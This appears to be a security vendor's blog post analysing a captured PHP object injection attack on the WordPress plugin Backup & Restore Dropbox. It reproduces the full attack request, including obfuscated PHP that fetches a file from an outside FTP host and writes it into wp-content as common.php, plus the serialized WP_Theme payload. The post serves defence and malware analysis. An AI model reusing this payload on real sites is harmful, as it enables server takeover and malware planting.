Top

common.php (Object Injection Vulnerability in Backup & Restore Dropbox)

WordPress plugin Backup & Restore Dropbox have PHP Object Injection Vulnerability. It’s allow remote download malware to the server.

This vulnerability founded by pluginvulnerabilities.com and published it.

We found that vulnerability try malware download common.php malware to server via FTP Protocol.

Real Post Payload

--5232150d-B--
POST / HTTP/1.1
Accept-Encoding: identity
Content-Length: 791
Host: malware.expert
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36
Connection: close
Cookie: cmd=echo%208a44d571857dd91b3fca6d302776b2ea; code=%24str%3Dfile_get_coNteNts%28chr%28102%29.chr%28116%29.chr%28112%29.chr%2858%29.chr%2847%29.chr%2847%29.chr%2897%29.chr%28110%29.chr%28111%29.chr%28110%29.chr%28121%29.chr%28109%29.chr%28111%29.chr%28117%29.chr%28115%29.chr%2858%29.chr%2849%29.chr%2850%29.chr%2851%29.chr%2864%29.chr%2853%29.chr%2852%29.chr%2846%29.chr%2849%29.chr%2853%29.chr%2851%29.chr%2846%29.chr%2852%29.chr%2854%29.chr%2846%29.chr%2856%29.chr%2853%29.chr%2858%29.chr%2856%29.chr%2848%29.chr%2847%29.chr%28116%29.chr%28109%29.chr%28112%29.chr%2847%29.chr%28116%29.chr%28109%29.chr%28112%29.chr%2847%29.chr%2897%29.chr%28110%29.chr%28111%29.chr%28110%29.chr%2844%29.chr%2847%29.chr%28116%29.chr%28101%29.chr%28115%29.chr%28116%29.chr%2846%29.chr%28112%29.chr%28104%29.chr%28112%29%29%3B+file_put_coNteNts%28ABSPATH.chr%2847%29.chr%28119%29.chr%28112%29.chr%2845%29.chr%2899%29.chr%28111%29.chr%28110%29.chr%28116%29.chr%28101%29.chr%28110%29.chr%28116%29.chr%2847%29.chr%2899%29.chr%28111%29.chr%28109%29.chr%28109%29.chr%28111%29.chr%28110%29.chr%2846%29.chr%28112%29.chr%28104%29.chr%28112%29%2C%24str%29%3B+die%28%29%3B;

First file_get_contents download common.php malware and file_put_contents write it to server.

Content-Type: application/x-www-form-urlencoded

--5232150d-C--
dropbox-backup_request=YToyOntzOjY6Im1ldGhvZCI7Tzo4OiJXUF9UaGVtZSI6NDp7czoxNzoiAFdQX1RoZW1lAGhlYWRlcnMiO2E6Mzp7czo0OiJOYW1lIjtzOjExOiIxIG5hbWUgaGVyZSI7czoxMDoiVGV4dERvbWFpbiI7czo1OiJlbl9VUyI7czoxMDoiRG9tYWluUGF0aCI7czoxOiIsIjt9czoyMDoiAFdQX1RoZW1lAHRoZW1lX3Jvb3QiO3M6NToiZnRwOi8iO3M6MjA6IgBXUF9UaGVtZQBzdHlsZXNoZWV0IjtzOjQyOiJhbm9ueW1vdXM6MTIzQDU0LjE1My40Ni44NTo4MC90bXAvdG1wL2Fub24iO3M6NToiY2FjaGUiO2E6MDp7fX1zOjY6InBhcmFtcyI7Tzo4OiJXUF9UaGVtZSI6NDp7czoxNzoiAFdQX1RoZW1lAGhlYWRlcnMiO2E6Mzp7czo0OiJOYW1lIjtzOjExOiIxIG5hbWUgaGVyZSI7czoxMDoiVGV4dERvbWFpbiI7czo1OiJlbl9VUyI7czoxMDoiRG9tYWluUGF0aCI7czoxOiIsIjt9czoyMDoiAFdQX1RoZW1lAHRoZW1lX3Jvb3QiO3M6NToiZnRwOi8iO3M6MjA6IgBXUF9UaGVtZQBzdHlsZXNoZWV0IjtzOjQyOiJhbm9ueW1vdXM6MTIzQDU0LjE1My40Ni44NTo4MC90bXAvdG1wL2Fub24iO3M6NToiY2FjaGUiO2E6MDp7fX19

dropbox-backup_request decoded

Array
(
    [method] => __PHP_Incomplete_Class Object
        (
            [__PHP_Incomplete_Class_Name] => WP_Theme
            [headers:WP_Theme:private] => Array
                (
                    [Name] => 1 name here
                    [TextDomain] => en_US
                    [DomainPath] => ,
                )

            [theme_root:WP_Theme:private] => ftp:/
            [stylesheet:WP_Theme:private] => anonymous:123@54.153.46.85:80/tmp/tmp/anon
            [cache] => Array
                (
                )

        )

    [params] => __PHP_Incomplete_Class Object
        (
            [__PHP_Incomplete_Class_Name] => WP_Theme
            [headers:WP_Theme:private] => Array
                (
                    [Name] => 1 name here
                    [TextDomain] => en_US
                    [DomainPath] => ,
                )

            [theme_root:WP_Theme:private] => ftp:/
            [stylesheet:WP_Theme:private] => anonymous:123@54.153.46.85:80/tmp/tmp/anon
            [cache] => Array
                (
                )

        )

)

Use Malware Expert Signatures to detect this malware from PHP files and clean them up.

, , , , , ,

Comments are closed.